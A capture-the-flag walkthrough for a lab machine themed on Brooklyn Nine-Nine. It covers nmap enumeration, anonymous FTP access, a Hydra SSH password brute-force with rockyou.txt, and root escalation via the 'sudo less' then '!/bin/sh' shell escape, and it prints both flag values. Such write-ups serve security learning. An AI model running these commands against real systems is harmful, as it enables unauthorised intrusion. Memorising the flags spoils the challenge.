Task 1. Deploy and get hacking.
1. User flag
ee11cbb19052e40b07aac0ca060c23ee
2. Root flag
63a9f0ea7bb98050796b649e85481845
1. Let start Scanning the IP with Nmap.
death@esther:~/Lab/Brooklyn-Nine-Nine$ nmap 10.10.112.152 -sV -sC -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-26 16:45 IST
Nmap scan report for 10.10.112.152
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.120.99
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.31 seconds
Here, We can see that there are 3 open ports:
1. FTP on port 21.
2. SSH on port 22.
3. HTTP on port 80.
2. We Get something Intreasting here "FTP".
Let try to login with default Credentials anonymous:anonymous
login successfully.
here we got a txt file. I just downloaded to my system using get command
Here is the txt file,
We got 2 username: Amy, Jake , holt and Jake is our username for ssh as we read note we understand that jake ssh password is weak.
3. Let Brute-force SSH using Hydra.
hydra -l jake -P /home/death/wordlists/rockyou.txt 10.10.112.152 ssh -t 50
login: jake password: 987654321
Logged In as Jake successfully.
I didn't find anything good in jake directory.
Let check for /home,
Here are 3 user, Let check hold directory.
Here is the User-Flag.txt
ee11cbb19052e40b07aac0ca060c23ee
4. Let escalate our privileges
Let's see if we can run any commands of root.
sudo -l
Ok we can run less command as root,Let visit gtfobin
search for less.
Here is for sudo:
sudo less /etc/profile
!/bin/sh
Let Run in terminal
Press Enter on keyboard
We got root
Let find root flag at /root
63a9f0ea7bb98050796b649e85481845
Thank you 😸